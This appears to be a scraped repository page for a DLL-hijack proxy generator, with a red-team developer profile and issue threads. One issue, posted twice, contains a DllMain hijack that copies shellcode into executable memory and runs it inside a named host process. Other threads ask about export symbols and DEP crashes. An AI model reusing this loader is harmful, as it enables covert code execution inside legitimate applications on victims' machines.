- 🔭 二进制攻防、逆向、恶意代码分析
- ⚡ 安全产品研发,红队武器库研发
- 🌱 深耕终端安全和数据安全领域
- 💬 qqmail: 79884260###qq.com @ 替换 ###
strivexjun / aheadlib-x86-x64 Goto Github PK
View Code? Open in Web Editor NEWhijack dll Source Code Generator. support x86/x64
hijack dll Source Code Generator. support x86/x64
软件优化的一般, 还有不少东西没有优化到
.rdata节数据未知! 继续?
ord:1256
func_rva:001193E0
名称:RtlNtdllName
AheadSource.h line 141, 应该是不小心写错了。
例如User32.dll->_UserTestTokenForInteractive
解决办法:
#pragma comment(linker, "/EXPORT:后需要加两个下划线,最终生成出来的导出函数才会有一个下划线
我在生成的文件添加了 shellcode 后 劫持是成功的 未报任何错误 但是当处理完新建的线程任务后 主程序exe就退出了
我不知道那里出错了 希望能帮忙看一下
代码如下
DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{
LPVOID newMemory;
HANDLE currentProcess;
SIZE_T bytesWritten;
BOOL didWeCopy = FALSE;
// Get the current process handle
currentProcess = GetCurrentProcess();
// Allocate memory with Read+Write+Execute permissions
newMemory = VirtualAllocEx(currentProcess, NULL, SHELLCODELEN, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (newMemory == NULL)
return -1;
// Copy the shellcode into the memory we just created
didWeCopy = WriteProcessMemory(currentProcess, newMemory, (LPCVOID)&shellcode, SHELLCODELEN, &bytesWritten);
if (!didWeCopy)
return -2;
// Yay! Let's run our shellcode!
((void(*)())newMemory)();
return 0;
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
if (dwReason == DLL_PROCESS_ATTACH)
{
DisableThreadLibraryCalls(hModule);
if (Load() && Init())
{
TCHAR szAppName[MAX_PATH] = TEXT("QMProxyAcceler.exe");//请修改宿主进程名
TCHAR szCurName[MAX_PATH];
GetModuleFileName(NULL, szCurName, MAX_PATH);
PathStripPath(szCurName);
//是否判断宿主进程名
if (StrCmpI(szCurName, szAppName) == 0)
{
//启动补丁线程或者其他操作
HANDLE hThread = CreateThread(NULL, NULL, ThreadProc, NULL, NULL, NULL);
if (hThread)
{
CloseHandle(hThread);
HANDLE threadHandle = CreateThread(NULL, 0, ThreadFunction, NULL, 0, NULL);
CloseHandle(threadHandle);
}
}
}
}
else if (dwReason == DLL_PROCESS_DETACH)
{
Free();
}
return TRUE;
}
X86肯定不能用ml64编译,但是用ml编译会报错。
unresolved external symbol AheadLib_XXX 报这个错误怎么解决呢
假定我现在导出了ABC函数:
.DATA
EXTERN pfnAheadLib_ABC:dq;
.....
AheadLib_ABC PROC
jmp pfnAheadLib_ABC
AheadLib_ABC ENDP
....
PVOID pfnAheadLib_ABC;
....
在dllmain里 load init 都没问题,但是EXE调用ABC函数的话,就崩溃了,如果把DLL的data段设置为可读可写可执行权限的话,一切没问题,所以我认为是DEP的事情,于是我在load \init 完毕后,就添加了VirtualProtectEx函数调用,但是返回为false ....
请问怎么搞
我在生成的文件添加了 shellcode 后 劫持是成功的 未报任何错误 但是当处理完新建的线程任务后 主程序exe就退出了
我不知道那里出错了 希望能帮忙看一下
代码如下
DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{
LPVOID newMemory;
HANDLE currentProcess;
SIZE_T bytesWritten;
BOOL didWeCopy = FALSE;
// Get the current process handle
currentProcess = GetCurrentProcess();
// Allocate memory with Read+Write+Execute permissions
newMemory = VirtualAllocEx(currentProcess, NULL, SHELLCODELEN, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (newMemory == NULL)
return -1;
// Copy the shellcode into the memory we just created
didWeCopy = WriteProcessMemory(currentProcess, newMemory, (LPCVOID)&shellcode, SHELLCODELEN, &bytesWritten);
if (!didWeCopy)
return -2;
// Yay! Let's run our shellcode!
((void(*)())newMemory)();
return 0;
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
if (dwReason == DLL_PROCESS_ATTACH)
{
DisableThreadLibraryCalls(hModule);
if (Load() && Init())
{
TCHAR szAppName[MAX_PATH] = TEXT("QMProxyAcceler.exe");//请修改宿主进程名
TCHAR szCurName[MAX_PATH];
GetModuleFileName(NULL, szCurName, MAX_PATH);
PathStripPath(szCurName);
//是否判断宿主进程名
if (StrCmpI(szCurName, szAppName) == 0)
{
//启动补丁线程或者其他操作
HANDLE hThread = CreateThread(NULL, NULL, ThreadProc, NULL, NULL, NULL);
if (hThread)
{
CloseHandle(hThread);
HANDLE threadHandle = CreateThread(NULL, 0, ThreadFunction, NULL, 0, NULL);
CloseHandle(threadHandle);
}
}
}
}
else if (dwReason == DLL_PROCESS_DETACH)
{
Free();
}
return TRUE;
}
求导出符号??的方法!
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.